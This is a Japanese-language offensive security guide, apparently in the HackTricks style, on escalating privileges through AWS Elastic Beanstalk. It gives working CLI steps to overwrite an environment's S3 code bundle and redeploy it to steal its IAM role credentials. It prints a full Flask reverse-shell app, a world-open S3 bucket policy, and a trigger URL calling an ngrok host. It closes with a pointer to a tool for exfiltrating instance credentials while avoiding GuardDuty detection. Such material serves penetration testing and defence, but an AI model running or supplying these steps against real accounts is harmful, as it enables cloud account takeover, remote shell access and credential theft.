Elastic Beanstalk
Elastic Beanstalkに関する詳細情報 は以下にあります:
AWS - Elastic Beanstalk Enum Beanstalkで敏感なアクションを実行するには、多くの異なるサービスで多くの敏感な権限を持っている必要があります 。例えば、**arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
**に与えられた権限を確認できます。
elasticbeanstalk:RebuildEnvironment
、S3書き込み権限&その他多数
環境のコードを含むS3バケットに対する書き込み権限 とアプリケーションを再構築 するための権限(elasticbeanstalk:RebuildEnvironment
やS3
、EC2
、Cloudformation
に関連するいくつかの権限が必要)を持っていると、コードを変更 し、アプリを再構築 することができ、次回アプリにアクセスすると新しいコードが実行され 、攻撃者がアプリケーションとそのIAMロールの資格情報を侵害することが可能になります。
Copy # Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip < files to zi p >
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
elasticbeanstalk:CreateApplication
, elasticbeanstalk:CreateEnvironment
, elasticbeanstalk:CreateApplicationVersion
, elasticbeanstalk:UpdateEnvironment
, iam:PassRole
など...
上記に加えて、いくつかの S3
、EC2
、cloudformation
、autoscaling
、および elasticloadbalancing
の権限が、ゼロから生の Elastic Beanstalk シナリオを作成するために必要です。
AWS Elastic Beanstalk アプリケーションを作成する:
Copy aws elasticbeanstalk create-application --application-name MyApp
Copy aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
既存の環境がすでに作成されていて、新しいものを作成したくない 場合は、既存のものを更新 することができます。
アプリケーションコードと依存関係をZIPファイルにパッケージします:
ZIPファイルをS3バケットにアップロードします:
Copy aws s3 cp MyApp . zip s3 : // elasticbeanstalk -< region >-< accId >/ MyApp . zip
AWS Elastic Beanstalk アプリケーションバージョンを作成します:
Copy aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1 .0 --source-bundle S3Bucket=" elasticbeanstalk- <region > -<accId > " , S3Key="MyApp.zip"
AWS Elastic Beanstalk 環境にアプリケーションバージョンをデプロイします:
Copy aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
elasticbeanstalk:CreateApplicationVersion
, elasticbeanstalk:UpdateEnvironment
, cloudformation:GetTemplate
, cloudformation:DescribeStackResources
, cloudformation:DescribeStackResource
, autoscaling:DescribeAutoScalingGroups
, autoscaling:SuspendProcesses
, autoscaling:SuspendProcesses
まず最初に、前のステップ に従って、被害者 で実行したいコード を含む正当なBeanstalk環境 を作成する必要があります。これには、これらの2つのファイル を含む単純なzip が必要です:
application.py requirements.txt
Copy from flask import Flask , request , jsonify
import subprocess , os , socket
application = Flask ( __name__ )
@application . errorhandler ( 404 )
def page_not_found ( e ):
return jsonify ( '404' )
@application . route ( "/" )
def index ():
return jsonify ( 'Welcome!' )
@application . route ( "/get_shell" )
def search ():
host = request . args . get ( 'host' )
port = request . args . get ( 'port' )
if host and port :
s = socket . socket (socket.AF_INET,socket.SOCK_STREAM)
s . connect ((host, int (port)))
os . dup2 (s. fileno (), 0 )
os . dup2 (s. fileno (), 1 )
os . dup2 (s. fileno (), 2 )
p = subprocess . call ([ "/bin/sh" , "-i" ])
return jsonify ( 'done' )
if __name__ == "__main__" :
application . run ()
Copy click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1
あなた自身の Beanstalk 環境で リバースシェルを実行している場合、次は それを移行 する時です 被害者 環境に。そうするためには、あなたの Beanstalk S3 バケットの バケットポリシーを更新 する必要がありますので、被害者がアクセスできるように します(これは バケットをすべての人に開放 することになります)。
Copy {
"Version" : "2008-10-17" ,
"Statement" : [
{
"Sid" : "eb-af163bf3-d27b-4712-b795-d1e33e331ca4" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"s3:ListBucket" ,
"s3:ListBucketVersions" ,
"s3:GetObject" ,
"s3:GetObjectVersion" ,
"s3:*"
] ,
"Resource" : [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" ,
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
} ,
{
"Sid" : "eb-58950a8c-feb6-11e2-89e0-0800277d041b" ,
"Effect" : "Deny" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "s3:DeleteBucket" ,
"Resource" : "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
Copy # Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket= "elasticbeanstalk-<region>-<accId>" ,S3Key= "revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host =0.tcp.eu.ngrok.io & port = 13528
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.